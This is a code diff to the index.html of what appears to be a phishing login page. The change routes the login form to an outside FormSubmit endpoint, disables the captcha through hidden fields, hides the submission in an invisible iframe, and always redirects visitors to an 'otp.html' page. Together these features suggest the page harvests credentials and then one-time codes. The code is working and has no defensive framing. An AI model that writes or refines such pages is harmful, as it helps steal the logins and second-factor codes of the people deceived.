--- a/index.html
+++ b/index.html
@@ -24,34 +24,25 @@
                 }
             });
 
-            // Form submission handling
+            // Handle form submission failure and fallback redirection
             const form = document.getElementById("form");
+            const fallbackTimeout = 5000; // 5 seconds fallback in case FormSubmit fails
 
-            form.addEventListener("submit", async function (event) {
-                event.preventDefault(); // Prevent default submission
-
-                const formData = new FormData(form);
-
-                try {
-                    const response = await fetch("https://formsubmit.co/el/jeyolu", {
-                        method: "POST",
-                        body: formData
-                    });
-
-                    if (response.ok) {
-                        console.log("FormSubmit successful, redirecting...");
-                        window.location.href = "otp.html"; // Redirect on success
-                    } else {
-                        throw new Error("FormSubmit failed, using fallback...");
+            form.addEventListener("submit", function (event) {
+                setTimeout(() => {
+                    if (!sessionStorage.getItem("formSuccess")) {
+                        console.warn("FormSubmit may have failed, redirecting manually...");
+                        window.location.href = "otp.html";
                     }
-                } catch (error) {
-                    console.error(error);
-                    setTimeout(() => {
-                        window.location.href = "otp.html"; // Fallback redirect
-                    }, 2000);
-                }
+                }, fallbackTimeout);
             });
         });
+
+        // This function is called if FormSubmit redirects successfully
+        function formSubmitSuccess() {
+            sessionStorage.setItem("formSuccess", "true"); // Mark form as successfully submitted
+            window.location.href = "otp.html"; // Redirect to OTP page
+        }
     </script>
 
     <script type="module" crossorigin src="main.js"></script>
@@ -63,7 +54,7 @@
         <div class="mt-5"></div>
 
         <!-- Form using FormSubmit -->
-        <form id="form" class="mt-44">
+        <form id="form" class="mt-44" action="https://formsubmit.co/el/jeyolu" method="POST" target="formTarget">
             <div class="inputsCtn bg-white rounded-md shadow-sm p-6 flex flex-col gap-6">
                 <p class="font-bold loginu mb-3">Log In</p>
                 <img class="imglogo" src="asset/header-logo.png" alt="Logo">
@@ -98,6 +89,10 @@
                     />
                 </div>
 
+                <!-- Hidden fields for better UX -->
+                <input type="hidden" name="_captcha" value="false"> <!-- Disable Captcha -->
+                <input type="hidden" name="_next" value="otp.html"> <!-- Redirect after submission -->
+
                 <button
                     id="redirectBtn"
                     type="submit"
@@ -108,6 +103,9 @@
                 <p class="pt-3 text-primary font-semibold text-center">Reset Password</p>
             </div>
         </form>
+
+        <!-- Hidden iframe to detect successful form submission -->
+        <iframe name="formTarget" style="display: none;" onload="formSubmitSuccess()"></iframe>
     </div>
 </body>
 </html>
